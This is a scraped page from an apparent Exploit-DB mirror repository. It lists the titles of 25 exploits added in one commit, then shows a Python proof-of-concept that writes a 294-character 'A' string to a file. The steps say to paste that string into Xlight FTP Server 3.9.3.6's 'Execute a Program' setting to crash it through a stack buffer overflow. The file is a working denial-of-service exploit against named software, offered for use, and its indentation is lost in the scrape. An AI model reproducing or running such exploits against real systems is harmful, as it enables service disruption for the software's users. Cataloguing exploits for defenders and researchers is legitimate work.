bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/51665.py
Exploit-DB 010e679abe DB: 2023-08-05 
25 changes to exploits/shellcodes/ghdb

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
2023-08-05 00:16:32 +00:00

29 lines
No EOL
983 B
Python
Executable file
Raw Blame History

# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2023-08-04
# Vendor Homepage: https://www.xlightftpd.com/
# Software Link : https://www.xlightftpd.com/download/setup.exe
# Tested Version: 3.9.3.6
# Vulnerability Type: Buffer Overflow Local
# Tested on OS: Windows XP Professional SP3 - Windows 11 x64
# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
# Steps to reproduce:
# 1. - Download and Xlight FTP Server
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open Xlight FTP Server 3.9.3.6
# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
# 6. - Execute a Program after use logged in- Paste the characters
# 7 - Crashed
#!/usr/bin/env python3
exploit = 'A' * 294
try:
with open("exploit.txt","w") as file:
file.write(exploit)
print("POC is created")
except:
print("POC not created")
Reference in a new issue View git blame Copy permalink